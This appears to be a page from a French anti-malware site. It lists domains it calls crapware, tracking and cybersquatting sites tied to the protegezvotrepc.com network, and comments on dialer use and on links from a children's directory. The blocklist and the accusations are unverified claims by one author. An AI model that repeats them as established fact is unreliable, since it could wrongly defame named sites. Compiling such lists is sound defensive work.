notice.phoneaccess.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
onestepdownloads.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
phoneaccess.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
proteccionparatupc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
protegezvotrepc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
protejaseupc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
secure.spanetworks.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
tausendedownloads.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
tele67.en.wanadoo.es #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
tuttigliantivirus.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
utilidadesparatupc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
utilitairespc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
utilitapc.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
paycom.net #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
signesduzodiaque.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
sync2it.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com
telecharger212.bravehost.com #crapware #tracking #cybersquatting #nébuleuse protegezvotrepc.com

Le site iris301, dans la nébuleuse protegezvotrepc point com, comporte, à lui seul, 38 pages interceptant le trafic d'Assiste de cette manière. Voici quelques résultats Google

ProtegezVotrePC.com
ProtegezVotrePC.com

ProtegezVotrePC.com
ProtegezVotrePC.com

ProtegezVotrePC.com
ProtegezVotrePC.com


Autre danger :

Un annuaire pour enfants pointe vers ce site : annuaire-enfants-kibodio.com

http://66.249.93.104/search?q=cache:XbGvEQbdaA4J:www.annuaire-enfants-kibodio.com/informatique/+%22protegezvotrepc.com%22&hl=fr&gl=fr&ct=clnk&cd=3
or ma première dénonciation de ce site était, entre autres, pour usage de dialer.
Il va falloir tenter d'identifier tous ses domaines et ses machines et mettre tout ça en liste noire.

protegezvotrepc.com dialer - protegezvotrepc.com - attaque contre assiste.com

Outils d'investigations


#Ailleurs sur le Web#